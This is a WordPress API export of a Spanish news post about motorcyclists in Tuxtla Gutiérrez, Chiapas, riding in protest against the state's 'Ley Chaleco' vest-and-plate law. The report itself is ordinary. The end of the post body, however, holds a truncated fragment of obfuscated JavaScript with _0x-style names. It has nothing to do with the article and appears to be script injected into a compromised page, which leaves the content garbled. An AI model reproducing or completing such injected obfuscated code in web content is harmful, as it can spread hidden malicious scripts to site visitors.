{"id":20022,"date":"2025-01-25T06:47:39","date_gmt":"2025-01-25T06:47:39","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20022"},"modified":"2025-01-25T06:47:40","modified_gmt":"2025-01-25T06:47:40","slug":"motociclistas-se-pronuncian-contra-la-ley-chaleco","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20022","title":{"rendered":"Motociclistas se pronuncian contra la Ley Chaleco"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"766\" data-id=\"20023\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250125-WA0003-1024x766.jpg\" alt=\"\" class=\"wp-image-20023\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250125-WA0003-1024x766.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250125-WA0003-300x224.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250125-WA0003-768x575.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250125-WA0003-1536x1149.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250125-WA0003.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"766\" data-id=\"20025\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250125-WA0006-1024x766.jpg\" alt=\"\" class=\"wp-image-20025\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250125-WA0006-1024x766.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250125-WA0006-300x224.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250125-WA0006-768x575.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250125-WA0006-1536x1149.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250125-WA0006.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"20024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250125-WA0002-1024x576.jpg\" alt=\"\" class=\"wp-image-20024\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250125-WA0002-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250125-WA0002-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250125-WA0002-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250125-WA0002.jpg 1160w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 24 de enero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Decenas de motociclistas integrantes de diferentes clubes realizaron una &#8220;rodada&#8221;, este viernes por la tarde para pronunciarse contra la denominada ley chaleco<\/p>\n\n\n\n<p>En dias pasados el Congreso del Estado legisl\u00f3 para que los motociclistas usen de manera obligatoria un chaleco con el n\u00famero de placa y en el frente de la unidad.<\/p>\n\n\n\n<p>Por ello los integrantes de Club&#8217;s de Motociclistas Evil Monkey, Clandestinos, Legendario Bikers, Cuervos del Infierno, Panteras negras, Jaguares Mayas entre otros y moto-repartidores juntos que integran el grupo denominado &#8220;Motociclistas Unidos Chiapas&#8221; realizaron esta caravana de motociclistas denominada &#8220;MEGA RODADA&#8221;.<\/p>\n\n\n\n<p>Esta movilizaci\u00f3n parti\u00f3 de dos puntos de la ciudad, del tramo Tuxtla Guti\u00e9rrez \u2013 Ocozocoautla altura de la Glorieta de \u201cLa Pochota\u201d y del estacionamiento de Plaza Poliforum.<\/p>\n\n\n\n<p>Ambas marchas caravanas de Motociclistas al centro de la ciudad en manifestaci\u00f3n pac\u00edfica en contra de la aprobaci\u00f3n de la ley Chaleco.<\/p>\n\n\n\n<p>Por varios minutos bloquearon la Avenida Central desde la Segunda Oriente hasta esquina del Explanada del Parque Central.<\/p>\n\n\n\n<p>en calle central se normaliza la vialidad con sentido al norte de la ciudad.<\/p>\n\n\n\n<p>Manuel Calvo Blanco vocero del grupo dijo integrante de el club de motos &#8220;bandido negro&#8221;* en d\u00f3nde no est\u00e1n de acuerdo con la ley chaleco pues vulnera su trabajo ya que no son delincuentes son motociclistas sanos.<\/p>\n\n\n\n<p>Se espera que esta movilizaci\u00f3n se lleve a cabo en todo el pa\u00eds.<\/p>\n\n\n\n<p>&#8220;El d\u00eda de hoy entregamos un pliego en congreso del Estado de plantear 16 ideas antes de que se aplique, al final propusimos en beneficio de todos los motociclistasnde Chiapas esto no se acaba aqu\u00ed vamos a seguir&#8221;, concluyeron.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 24 de enero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Decenas de motociclistas integrantes de diferentes clubes realizaron una &#8220;rodada&#8221;, este viernes por la tarde para pronunciarse contra la denominada ley chaleco En dias pasados el Congreso del Estado legisl\u00f3 para que los motociclistas usen de manera obligatoria un chaleco con el n\u00famero &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20025,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-20022","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20022","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20022"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20022\/revisions"}],"predecessor-version":[{"id":20026,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20022\/revisions\/20026"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20025"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20022"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20022"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20022"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}